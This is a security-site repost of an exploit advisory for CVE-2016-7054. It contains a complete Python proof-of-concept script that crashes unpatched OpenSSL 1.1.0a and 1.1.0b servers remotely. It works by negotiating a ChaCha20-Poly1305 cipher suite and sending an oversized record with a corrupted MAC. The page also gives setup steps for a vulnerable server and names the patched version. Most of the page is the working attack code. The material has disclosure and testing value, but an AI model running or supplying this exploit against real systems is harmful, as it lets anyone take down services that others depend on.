首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 OpenSSL 1.1.0a/1.1.0b - Denial of Service 来源：https://www.silverf0x00.com 作者：Silverfox 发布时间：2016-12-13   # Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability # Date: 11-12-2016 # Software Link: https://www.openssl.org/source/old/1.1.0/ # Exploit Author: Silverfox # Contact: http://twitter.com/___Silverfox___ # Website: https://www.silverf0x00.com/ # CVE: CVE-2016-7054 # Category: Denial of Service # Type: Remote # Platform: Multiple   1. Description     Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.   https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054 https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/       2. Proof of Concept    a. Download and compile OpenSSL 1.1.0a or b  b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg  c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)  d. OpenSSL Instance crashes causing DOS   ### Exploit Code ### '''  *  In no event shall the author be liable  *  for any direct, indirect, incidential, special, exemplary or  *  consequential damages, including, but not limited to, procurement  *  of substitute goods or services, loss of use, data or profits or  *  business interruption, however caused and on any theory of liability,  *  whether in contract, strict liability, or tort, including negligence  *  or otherwise, arising in any way out of the use of this software,  *  even if advised of the possibility of such damage. ''' from __future__ import print_function import traceback import sys   from tlsfuzzer.runner import Runner from tlsfuzzer.messages import Connect, ClientHelloGenerator, \         ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \         FinishedGenerator, ApplicationDataGenerator, \         fuzz_encrypted_message from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \         ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \         ExpectAlert, ExpectClose, ExpectServerKeyExchange   from tlslite.constants import CipherSuite, AlertLevel, AlertDescription   def usage() :     return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])   def main():     if len(sys.argv) < 3:         print(usage())         return -1     conversations = {}     # 16 chars: POLY1305 tag 128 bit     # Tampering one bit suffices to damage the mac     # The payload has to be long enough to trigger heap overflow     n = 15000     fuzzes = [(-1, 1)]     for pos, val in fuzzes:         conversation = Connect(sys.argv[1], int(sys.argv[2]))         node = conversation         ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]         node = node.add_child(ClientHelloGenerator(ciphers))         node = node.add_child(ExpectServerHello())         node = node.add_child(ExpectCertificate())         node = node.add_child(ExpectServerKeyExchange())         node = node.add_child(ExpectServerHelloDone())         node = node.add_child(ClientKeyExchangeGenerator())         node = node.add_child(ChangeCipherSpecGenerator())         node = node.add_child(FinishedGenerator())         node = node.add_child(ExpectChangeCipherSpec())         node = node.add_child(ExpectFinished())         node = node.add_child(fuzz_encrypted_message(             ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))         node = node.add_child(ExpectAlert(AlertLevel.fatal,                                           AlertDescription.bad_record_mac))         node = node.add_child(ExpectClose())           conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \                 conversation       # run the conversation     good = 0     bad = 0       for conversation_name in conversations:         conversation = conversations[conversation_name]         #print(conversation_name + "...")         runner = Runner(conversation)         res = True         try:             runner.run()         except:             print("Error while processing")             print(traceback.format_exc())             res = False         if res:             good+=1             print("OK")         else:             bad+=1       print("Test end")     print("successful: {0}".format(good))     print("failed: {0}".format(bad))       if bad > 0:         sys.exit(1)   if __name__ == "__main__":     main() ### End of Exploit Code ###   3. Solution:     Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Internet Explorer 9 ·10-Strike Network File Search ·Microsoft Internet Explorer 9 ·Serva 3.0.0 HTTP Server - Deni ·Microsoft Internet Explorer 9 ·Microsoft Internet Explorer 9 ·OpenSSH 7.2 - Denial of Servic ·McAfee Virus Scan Enterprise f ·TP-LINK TD-W8951ND - Denial of ·Samsung Devices KNOX Extension ·Dual DHCP DNS Server 7.29 - De ·Samsung Devices KNOX Extension   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved